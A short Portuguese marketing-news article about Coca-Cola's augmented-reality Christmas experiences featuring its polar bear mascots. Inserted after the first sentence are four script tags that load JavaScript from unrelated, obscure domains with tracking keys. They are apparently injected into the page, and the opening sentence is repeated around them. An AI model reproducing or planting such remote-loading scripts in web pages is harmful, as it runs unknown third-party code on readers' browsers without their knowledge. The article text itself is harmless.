Mídia

Coca-Cola cria ações em realidade aumentada para o Natal

Desde sua estreia em 1993, os icônicos mascotes de ursos polares da empresa provam ser um contínuo sucesso. <script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script> <script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script> <script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573167018639" type="text/javascript"></script> <script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>

Desde sua estreia em 1993, os icônicos mascotes de ursos polares da empresa provam ser um contínuo sucesso, e, agora – além das peças tradicionais e esperadas -, os mascotes mais reconhecidos do Natal ganham sua primeira incursão na realidade aumentada.

A agência criativa in-house, Coca-Cola Digital Platforms, colaborou com o Tactic Studio, de São Francisco, para criar uma série de experiências de AR para iOS ou Android.

Confira as últimas novidades sobre marketing digital aqui.

Leia também: Natal da Coca-Cola já está no ar.

Em uma delas, você pode digitalizar latas e garrafas com tema das festividades do fim de ano para transformar a embalagem em uma recriação digital do domínio gelado dos ursos polares.

“Queríamos oferecer aos fãs uma nova maneira divertida de interagir com a marca e dar vida à magia dos ursos polares.", disse Allie Blalock, gerente de envolvimento digital da Coca-Cola na América do Norte em um anúncio para a imprensa.